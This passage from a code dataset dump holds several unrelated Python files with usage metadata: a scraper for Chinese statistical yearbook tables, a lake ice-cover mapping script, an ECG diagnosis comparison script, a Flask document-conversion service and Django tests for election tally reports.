"call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "attribute"}, {"api_name": "soccer.gcal.gcal.delete_event", "line_number": 93, "usage_type": "call"}, {"api_name": "pymongo.DESCENDING", "line_number": 111, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 115, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 116, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 128, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 128, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 128, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 129, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 133, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 133, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path", "line_number": 138, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 144, "usage_type": "call"}]} +{"seq_id": "580906518", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport urllib.request\nimport time\nimport csv\n\n\ndef get_request_years():\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'}\n page = requests.get(\"http://www.stats.gov.cn/tjsj/ndsj/\", headers = headers)\n\n html = BeautifulSoup(page.content, 'html.parser')\n table = html.find('table', 'ztzw_tab')\n print(table)\n links = table.findAll('a')\n years_hrefs = []\n for link in links:\n years_hrefs.append(link['href'])\n\n print(years_hrefs)\n return years_hrefs\n\n\n\n\ndef get_data_for_year(year):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'}\n left_link = re.sub('indexch', 'left', year)\n base_link = re.sub('indexch.htm', '', year)\n base_year = re.findall('\\d+', base_link)[0]\n year_page = requests.get(left_link, headers=headers)\n year_html = BeautifulSoup(year_page.content)\n if len(year_html.findAll('ul', {'id': 'foldinglist'})) != 0:\n folding_lists = year_html.findAll('ul', {'id': 'foldinglist'})\n else:\n folding_lists = year_html.findAll('ul', {'id': re.compile('divOne_*')})\n\n\n for folding_list in folding_lists:\n li_lists = folding_list.findAll('li')\n\n for li_list in li_lists:\n file = li_list.find(\"a\").get('href')\n name = li_list.find(\"a\").text.strip()\n name = re.sub('\\W+', '', name)\n print(file)\n\n if '.jpg' in file:\n retries = 3\n success = False\n while not success and retries >= 0:\n if retries == 0:\n raise Exception(\"cause of the problem, time out\")\n\n try:\n urllib.request.urlretrieve(base_link + file,\n 'C:\\\\Users\\\\jocel\\\\OneDrive\\\\Desktop\\\\test\\\\' + base_year + name + '.jpg')\n success = True\n except Exception as e:\n wait = retries * 30\n time.sleep(wait)\n retries -= 1\n print(e)\n elif '简要说明' in name:\n pass\n elif '主要统计指标解释' in name:\n pass\n elif '.htm' in file:\n retries = 3\n success = False\n while not success and retries >= 0:\n if retries == 0:\n raise Exception(\"cause of the problem, time out\")\n\n try:\n print(file)\n print(base_link)\n add = re.sub(r'\\b.htm\\b', '.xls', base_link + file)\n print(add)\n urllib.request.urlretrieve(add,\n 'C:\\\\Users\\\\jocel\\\\OneDrive\\\\Desktop\\\\test\\\\' + base_year + name + '.xls')\n\n success = True\n except Exception as e:\n wait = retries * 30\n time.sleep(wait)\n retries -= 1\n print(e)\n\n\n else:\n raise Exception(\"cause of the problem\")\n\ndef flow():\n years_hrefs = get_request_years()\n for year_href in years_hrefs:\n print(year_href)\n get_data_for_year(year_href)\n\n\n\nif __name__== \"__main__\":\n flow()\n", "sub_path": "get_stat_data.py", "file_name": "get_stat_data.py", "file_ext": "py", "file_size_in_byte": 3595, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 14, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 31, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 32, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 33, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 34, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 35, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 39, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 48, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 59, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 59, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 59, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 64, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 81, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 83, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 83, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 83, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 89, "usage_type": "call"}]} +{"seq_id": "322139505", "text": "import fiona\nimport numpy as np\nimport pandas as pd \nimport geopandas as gpd\nimport shapely\nfrom shapely.geometry import Point, Polygon\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nimport descartes\nfrom sklearn.linear_model import LogisticRegression\nimport geoplot as gplt\nimport geoplot.crs as gcrs\nimport joblib\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.model_selection import cross_val_score\nfrom imblearn.over_sampling import SMOTE\nfrom sklearn.feature_selection import RFE\nimport statsmodels.api as sm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.impute import SimpleImputer\n\nRES_CONST = 0.25\npd.set_option('display.max_columns', None)\n\n\ninfile1 =\"https://pasta.lternet.edu/package/data/eml/edi/267/2/1c716f66bf3572a37a9f67035f9e02ac\".strip() \ninfile1 = infile1.replace(\"https://\",\"http://\")\n \ndt1 =pd.read_csv(infile1 \n ,skiprows=1\n ,sep=\",\" \n ,quotechar='\"' \n , names=[\n \"lakecode\", \n \"lakename\", \n \"continent\", \n \"country\", \n \"state\", \n \"IntermittentIceCover\", \n \"Latitude_dd\", \n \"Longitude_dd\", \n \"Elevation_m\", \n \"MeanAnnualAirTemp_c\", \n \"SurfaceArea_km2\", \n \"MeanDepth_m\", \n \"MaximumDepth_m\", \n \"Volume_mcm\", \n \"WatershedArea_km2\", \n \"ShorelineLength_km\", \n \"ResidenceTime_days\", \n \"MeanDischarge_m3_sec\", \n \"Slope_degrees\", \n \"ShorelineDevelopment\", \n \"JFMCloudCover_perc\", \n \"JFMPrecipitation_mm\", \n \"DistanceToCoast_km\", \n \"MaximumDistanceToLand_km\" ]\n )\n# Coerce the data into the types specified in the metadata \ndt1.lakecode=dt1.lakecode.astype('category') \ndt1.lakename=dt1.lakename.astype('category') \ndt1.continent=dt1.continent.astype('category') \ndt1.country=dt1.country.astype('category') \ndt1.state=dt1.state.astype('category') \ndt1.IntermittentIceCover=dt1.IntermittentIceCover.astype('category') \ndt1.Latitude_dd=pd.to_numeric(dt1.Latitude_dd,errors='coerce') \ndt1.Longitude_dd=pd.to_numeric(dt1.Longitude_dd,errors='coerce') \ndt1.Elevation_m=pd.to_numeric(dt1.Elevation_m,errors='coerce') \ndt1.MeanAnnualAirTemp_c=pd.to_numeric(dt1.MeanAnnualAirTemp_c,errors='coerce') \ndt1.SurfaceArea_km2=pd.to_numeric(dt1.SurfaceArea_km2,errors='coerce') \ndt1.MeanDepth_m=pd.to_numeric(dt1.MeanDepth_m,errors='coerce') \ndt1.MaximumDepth_m=pd.to_numeric(dt1.MaximumDepth_m,errors='coerce') \ndt1.Volume_mcm=pd.to_numeric(dt1.Volume_mcm,errors='coerce') \ndt1.WatershedArea_km2=pd.to_numeric(dt1.WatershedArea_km2,errors='coerce') \ndt1.ShorelineLength_km=pd.to_numeric(dt1.ShorelineLength_km,errors='coerce') \ndt1.ResidenceTime_days=pd.to_numeric(dt1.ResidenceTime_days,errors='coerce') \ndt1.MeanDischarge_m3_sec=pd.to_numeric(dt1.MeanDischarge_m3_sec,errors='coerce') \ndt1.Slope_degrees=pd.to_numeric(dt1.Slope_degrees,errors='coerce') \ndt1.ShorelineDevelopment=pd.to_numeric(dt1.ShorelineDevelopment,errors='coerce') \ndt1.JFMCloudCover_perc=pd.to_numeric(dt1.JFMCloudCover_perc,errors='coerce') \ndt1.JFMPrecipitation_mm=pd.to_numeric(dt1.JFMPrecipitation_mm,errors='coerce') \ndt1.DistanceToCoast_km=pd.to_numeric(dt1.DistanceToCoast_km,errors='coerce') \ndt1.MaximumDistanceToLand_km=pd.to_numeric(dt1.MaximumDistanceToLand_km,errors='coerce') \n\ndt = dt1.filter(['Latitude_dd', 'Longitude_dd', 'IntermittentIceCover'])\ndt['IntermittentIceCover'] = dt['IntermittentIceCover'].map({'Y': 1, 'N': 0})\n\ndt = gpd.GeoDataFrame(dt, geometry = gpd.points_from_xy(dt.Longitude_dd, dt.Latitude_dd))\n\nannualLakes= dt[dt['IntermittentIceCover']==0]\nprint(annualLakes.shape)\nintermittentLakes= dt[dt['IntermittentIceCover']==1]\nprint(intermittentLakes.shape)\n\nworld = gpd.read_file(gpd.datasets.get_path('naturalearth_lowres'))\n\nax = gplt.polyplot(world, projection=gplt.crs.NorthPolarStereo(), facecolor='whitesmoke', figsize = (15, 15))\n\ngplt.pointplot(annualLakes, color = 'black', ax = ax, s = 10, label = 'Annual winter ice')\ngplt.pointplot(intermittentLakes, color = 'tab:orange', ax = ax, s = 10, label = 'Intermittent winter ice')\nlgnd = plt.legend(loc=\"lower left\", scatterpoints=1, fontsize=18)\nlgnd.legendHandles[0]._sizes = [100]\nlgnd.legendHandles[1]._sizes = [100]\nplt.savefig('trainingLakeMap.png', bbox_inches='tight')\nplt.clf()\n", "sub_path": "trainingMap.py", "file_name": "trainingMap.py", "file_ext": "py", "file_size_in_byte": 4823, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.set_option", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 69, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 76, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 79, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 80, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 81, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 82, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 83, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 84, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 85, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 90, "usage_type": "call"}, {"api_name": "geopandas.points_from_xy", "line_number": 90, "usage_type": "call"}, {"api_name": "geopandas.read_file", "line_number": 97, "usage_type": "call"}, {"api_name": "geopandas.datasets.get_path", "line_number": 97, "usage_type": "call"}, {"api_name": "geopandas.datasets", "line_number": 97, "usage_type": "attribute"}, {"api_name": "geoplot.polyplot", "line_number": 99, "usage_type": "call"}, {"api_name": "geoplot.crs.NorthPolarStereo", "line_number": 99, "usage_type": "call"}, {"api_name": "geoplot.crs", "line_number": 99, "usage_type": "attribute"}, {"api_name": "geoplot.pointplot", "line_number": 101, "usage_type": "call"}, {"api_name": "geoplot.pointplot", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}]} +{"seq_id": "191366773", "text": "import os\nfrom configparser import ConfigParser\n\nimport pandas as pd\nfrom ecgpandas.loader import Loader\n\n\ndef statistics(statements, original_statements, lookup):\n print(\"With multi and modifiers\")\n added_and_removed(original_statements, statements)\n\n print(\"With multi and no modifiers\")\n statement_types = lookup.rename(columns={'TopLvlFolder': 'Group'}).Type.to_frame()\n statements = pd.merge(statements, statement_types, left_on='Statement', right_index=True)\n original_statements = pd.merge(original_statements, statement_types, left_on='Statement', right_index=True)\n\n statements = statements.loc[statements.Type == 2]\n original_statements = original_statements.loc[original_statements.Type == 2]\n\n statements.drop('Type', axis=1, inplace=True)\n original_statements.drop('Type', axis=1, inplace=True)\n\n added_and_removed(original_statements, statements)\n\n print(\"No multi and no modifiers\")\n statements = statements.groupby(['PatientID', 'Date'], group_keys=False).filter(lambda g: len(g) == 1)\n original_statements = original_statements.groupby(['PatientID', 'Date'], group_keys=False).filter(lambda g: len(g) == 1)\n\n added_and_removed(original_statements, statements)\n\n print(\"Most important, our data set\")\n iterative_count_differences(original_statements, statements)\n\n\ndef iterative_count_differences(original, statements):\n original.set_index(['PatientID', 'Date'], inplace=True)\n statements.set_index(['PatientID', 'Date'], inplace=True)\n\n original.drop('index', axis=1, inplace=True)\n statements.drop('index', axis=1, inplace=True)\n\n\n original_dict = original.squeeze().to_dict()\n statement_dict = statements.squeeze().to_dict()\n\n total = statements.shape[0]\n changed = 0\n\n for idx in statement_dict.keys():\n if idx in original_dict:\n if statement_dict[idx] != original_dict[idx]:\n changed += 1\n\n\n print(\"Ratio changed records by doctors {}\".format(changed/total))\n\n\ndef added_and_removed(original_statements, statements):\n statements.reset_index(inplace=True)\n original_statements.reset_index(inplace=True)\n records_with_added = statements.merge(original_statements.drop_duplicates(), on=['PatientID', 'Date', 'Statement'],\n how='left', indicator=True)\n records_with_added = records_with_added.loc[records_with_added._merge == 'left_only']\n records_with_added.set_index(['PatientID', 'Date'], inplace=True)\n number_with_added = records_with_added.index.unique().shape[0]\n ratio_records_with_added_statements = number_with_added / statements.index.unique().shape[0]\n print(\"Ratio changed records with added statments by doctors {}\".format(ratio_records_with_added_statements))\n records_with_removed = statements.merge(original_statements.drop_duplicates(),\n on=['PatientID', 'Date', 'Statement'], how='right', indicator=True)\n records_with_removed = records_with_removed.loc[records_with_removed._merge == 'right_only']\n records_with_removed.set_index(['PatientID', 'Date'], inplace=True)\n number_with_removed = records_with_removed.index.unique().shape[0]\n ratio_records_with_removed_statements = number_with_removed / statements.index.unique().shape[0]\n print(\"Ratio changed records with removed statments by doctors {}\".format(ratio_records_with_removed_statements))\n\n\ndef smart_stats(original, statements):\n pass\n\ndef main():\n config_parser = ConfigParser(allow_no_value=True)\n config_parser.read(\"../local.conf\")\n\n path = config_parser.get('Default', 'Path')\n\n statements_path = os.path.join(os.path.sep, path, \"SW10\", \"Parsed\", \"with_modifiers\", \"statement.csv\")\n original_statements_path = os.path.join(os.path.sep, path, \"SW10\", \"Parsed\", \"with_modifiers\",\n \"original_statement.csv\")\n\n print(\"Loading statements and machine generated statements\")\n statements = pd.read_csv(statements_path)\n original = pd.read_csv(original_statements_path)\n\n statements.set_index([\"PatientID\", \"Date\"], inplace=True)\n original.set_index([\"PatientID\", \"Date\"], inplace=True)\n\n lookup = Loader(path).load_statement_lookup()\n\n statement_types = lookup.rename(columns={'TopLvlFolder': 'Group'}).Type.to_frame()\n statements = pd.merge(statements, statement_types, left_on='Statement', right_index=True)\n original = pd.merge(original, statement_types, left_on='Statement', right_index=True)\n\n smart_stats(original, statements)\n\n # statistics(statements, original_statements, lookup)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "statistics/original_vs_newdiagnoses.py", "file_name": "original_vs_newdiagnoses.py", "file_ext": "py", "file_size_in_byte": 4657, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.merge", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 15, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 91, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 92, "usage_type": "call"}, {"api_name": "ecgpandas.loader.Loader", "line_number": 97, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 101, "usage_type": "call"}]} +{"seq_id": "505005378", "text": "import os\nimport logging\nimport traceback\nfrom threading import RLock\nfrom flask import Flask, request, send_file\nfrom tempfile import mkstemp\nfrom werkzeug.wsgi import ClosingIterator\nfrom werkzeug.exceptions import HTTPException\nfrom pantomime import FileName, normalize_mimetype, mimetype_extension\n\nfrom convert.converter import Converter, ConversionFailure\nfrom convert.formats import load_mime_extensions\nfrom .document_types import *\n\nlogging.basicConfig(level=logging.DEBUG)\nlog = logging.getLogger('convert')\nlock = RLock()\nextensions = load_mime_extensions()\nconverter = Converter()\n\n\nclass ShutdownMiddleware:\n def __init__(self, application):\n self.application = application\n\n def post_request(self):\n if app.is_dead:\n os._exit(127)\n\n def __call__(self, environ, after_response):\n iterator = self.application(environ, after_response)\n try:\n return ClosingIterator(iterator, [self.post_request])\n except Exception:\n traceback.print_exc()\n return iterator\n\n\napp = Flask(\"convert\")\napp.is_dead = False\napp.wsgi_app = ShutdownMiddleware(app.wsgi_app)\n\n\n@app.route(\"/\")\ndef info():\n if app.is_dead:\n return (\"BUSY\", 503)\n return (\"OK\", 200)\n\n\n@app.route(\"/convert\", methods=['POST'])\ndef convert():\n acquired = lock.acquire(timeout=1)\n if app.is_dead or not acquired:\n return (\"BUSY\", 503)\n timeout = int(request.args.get('timeout', 1000))\n upload_file = None\n output_format = request.form.get('format')\n if not output_format in LIBREOFFICE_EXPORT_TYPES:\n return (\"%s format is not supported\" % (output_format), 400)\n try:\n for upload in request.files.values():\n file_name = FileName(upload.filename)\n mime_type = normalize_mimetype(upload.mimetype)\n if not file_name.has_extension:\n file_name.extension = extensions.get(mime_type)\n if not file_name.has_extension:\n file_name.extension = mimetype_extension(mime_type)\n fd, upload_file = mkstemp(suffix=file_name.safe())\n os.close(fd)\n log.info('Convert to %s: %s [%s]',\n output_format, upload_file, mime_type)\n upload.save(upload_file)\n converter.convert_file(upload_file, output_format, timeout)\n output_filename = \"%s.%s\" % (converter.OUT, output_format)\n log.info(\"Send file %s [Mime-type: %s]\" %\n (output_filename, OUTPUT_MIME_TYPES[output_format]))\n return send_file(output_filename,\n mimetype=OUTPUT_MIME_TYPES[output_format],\n attachment_filename=output_filename)\n return ('No file uploaded', 400)\n except HTTPException:\n raise\n except ConversionFailure as ex:\n app.is_dead = True\n return (str(ex), 400)\n except Exception as ex:\n app.is_dead = True\n log.error('Error: %s', ex)\n return ('FAIL', 503)\n finally:\n if upload_file is not None and os.path.exists(upload_file):\n os.unlink(upload_file)\n if os.path.exists(converter.OUT):\n os.unlink(converter.OUT)\n lock.release()\n", "sub_path": "convert/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3240, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 15, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "threading.RLock", "line_number": 17, "usage_type": "call"}, {"api_name": "convert.formats.load_mime_extensions", "line_number": 18, "usage_type": "call"}, {"api_name": "convert.converter.Converter", "line_number": 19, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 28, "usage_type": "call"}, {"api_name": "werkzeug.wsgi.ClosingIterator", "line_number": 33, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.files.values", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 62, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "name"}, {"api_name": "pantomime.FileName", "line_number": 63, "usage_type": "call"}, {"api_name": "pantomime.normalize_mimetype", "line_number": 64, "usage_type": "call"}, {"api_name": "pantomime.mimetype_extension", "line_number": 68, "usage_type": "call"}, {"api_name": "tempfile.mkstemp", "line_number": 69, "usage_type": "call"}, {"api_name": "os.close", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 78, "usage_type": "call"}, {"api_name": "werkzeug.exceptions.HTTPException", "line_number": 82, "usage_type": "name"}, {"api_name": "convert.converter.ConversionFailure", "line_number": 84, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "107541633", "text": "import json\n\nfrom django.test import RequestFactory\n\nfrom tally_ho.libs.permissions import groups\nfrom tally_ho.apps.tally.models.center import Center\nfrom tally_ho.apps.tally.models.candidate import Candidate\nfrom tally_ho.libs.models.enums.form_state import FormState\nfrom tally_ho.libs.models.enums.entry_version import EntryVersion\nfrom tally_ho.libs.models.enums.center_type import CenterType\nfrom tally_ho.apps.tally.views.reports import (\n administrative_areas_reports as admin_reports,\n)\nfrom tally_ho.libs.tests.test_base import (\n create_electrol_race, create_result_form, create_station,\\\n create_reconciliation_form, create_sub_constituency, create_tally,\\\n create_region, create_constituency, create_office, create_result,\\\n create_candidates, TestBase, create_ballot\n)\nfrom tally_ho.libs.tests.fixtures.electrol_race_data import (\n electrol_races\n)\n\n\n\nclass TestAdministrativeAreasReports(TestBase):\n def setUp(self):\n self.factory = RequestFactory()\n self._create_permission_groups()\n self._create_and_login_user()\n self._add_user_to_group(self.user, groups.TALLY_MANAGER)\n self.tally = create_tally()\n self.tally.users.add(self.user)\n self.electrol_race = create_electrol_race(\n self.tally,\n **electrol_races[0]\n )\n ballot = create_ballot(self.tally, electrol_race=self.electrol_race)\n self.region = create_region(tally=self.tally)\n office = create_office(tally=self.tally, region=self.region)\n self.constituency = create_constituency(tally=self.tally)\n self.sc =\\\n create_sub_constituency(code=1, field_office='1', ballots=[ballot])\n center, _ = Center.objects.get_or_create(\n code='1',\n mahalla='1',\n name='1',\n office=office,\n region='1',\n village='1',\n active=True,\n tally=self.tally,\n sub_constituency=self.sc,\n center_type=CenterType.GENERAL,\n constituency=self.constituency\n )\n self.station = create_station(\n center=center, registrants=20, tally=self.tally\n )\n self.result_form = create_result_form(\n tally=self.tally,\n form_state=FormState.ARCHIVED,\n office=office,\n center=center,\n station_number=self.station.station_number,\n ballot=ballot)\n self.recon_form = create_reconciliation_form(\n result_form=self.result_form,\n user=self.user,\n number_ballots_inside_box=20,\n number_cancelled_ballots=0,\n number_spoiled_ballots=0,\n number_unstamped_ballots=0,\n number_unused_ballots=0,\n number_valid_votes=20,\n number_invalid_votes=0,\n number_ballots_received=20,\n )\n votes = 20\n create_candidates(\n self.result_form, votes=votes, user=self.user,\n num_results=1, tally=self.tally\n )\n for result in self.result_form.results.all():\n result.entry_version = EntryVersion.FINAL\n result.save()\n # create duplicate final results\n create_result(self.result_form, result.candidate, self.user, votes)\n\n def test_sub_constituency_turn_out_and_votes_summary_reports(self):\n \"\"\"\n Test that the sub constituency turn out and votes summary reports are\n rendered as expected.\n \"\"\"\n # add\n view = admin_reports.SummaryReportDataView.as_view()\n request = self.factory.post('/sub-constituency-summary-report')\n request.user = self.user\n response = view(\n request,\n tally_id=self.tally.pk,\n region_id=self.region.pk,\n constituency_id=self.constituency.pk\n )\n\n # Sub Constituency votes summary report tests\n code, valid_votes, invalid_votes, cancelled_votes, _, _, _ =\\\n json.loads(\n response.content.decode())['data'][0]\n\n self.assertEquals(\n code, '{}'.format(self.sc.code))\n self.assertEquals(\n valid_votes,\n '{}'.format(\n self.recon_form.number_valid_votes))\n self.assertEquals(\n invalid_votes,\n '{}'.format(\n self.recon_form.number_invalid_votes))\n self.assertEquals(\n cancelled_votes,\n '{}'.format(\n self.recon_form.number_cancelled_ballots))\n\n view = admin_reports.ProgressiveReportDataView.as_view()\n request = self.factory.get('/sub-cons-progressive-report-list')\n request.user = self.user\n response = view(\n request,\n tally_id=self.tally.pk,\n region_id=self.region.pk,\n constituency_id=self.constituency.pk)\n candidates_count = Candidate.objects.filter(\n tally__id=self.tally.pk).count()\n\n # Sub Constituency progressive report tests\n code, num_candidates, num_votes, _, _, _ =\\\n json.loads(\n response.content.decode())['data'][0]\n\n self.assertEquals(\n code, '{}'.format(self.sc.code))\n self.assertEquals(\n num_votes,\n '{}'.format(\n self.result_form.num_votes))\n self.assertEquals(\n num_candidates,\n '{}'.format(\n candidates_count))\n\n def apply_filter(self, data):\n view = admin_reports.ResultFormResultsListDataView.as_view()\n request = self.factory.post('/form-results', data=data)\n request.user = self.user\n response = view(\n request,\n tally_id=self.tally.pk,\n )\n return response\n\n def test_result_form_result_list_data_view_filters(self):\n \"\"\"\n Test ResultFormResultsListDataView filters\n \"\"\"\n # test race type filter\n data = {\n \"data\": str(\n {\n \"election_level_names\":\n [\"Presidential\"],\n \"sub_race_type_names\":\n [\"ballot_number_presidential_runoff\"]\n }\n )\n }\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n data = {\n \"data\": str(\n {\n \"election_level_names\": [\"Presidential\"],\n \"sub_race_type_names\": [\"ballot_number_presidential\"]\n }\n )\n }\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n\n # test center filter\n data = {'data': '{\"select_1_ids\": [\"-1\"]}'} # non existent id\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n center_id = self.station.center.id\n data = {'data': '{\"select_1_ids\": ' + f'[\"{center_id}\"]' + '}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n\n # test stations filter\n data = {'data': '{\"select_2_ids\": [\"-1\"]}'} # non existent id\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n station_id = self.station.id\n data = {'data': '{\"select_2_ids\": ' + f'[\"{station_id}\"]' + '}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n\n # test ballot status filter\n data = {'data': '{\"ballot_status\": [\"not_available_for_release\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n data = {'data': '{\"ballot_status\": [\"available_for_release\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n\n # test station filter\n data = {'data': '{\"station_status\": [\"active\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n data = {'data': '{\"station_status\": [\"inactive\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n\n # test candidate status\n data = {'data': '{\"candidate_status\": [\"active\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n data = {'data': '{\"candidate_status\": [\"inactive\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 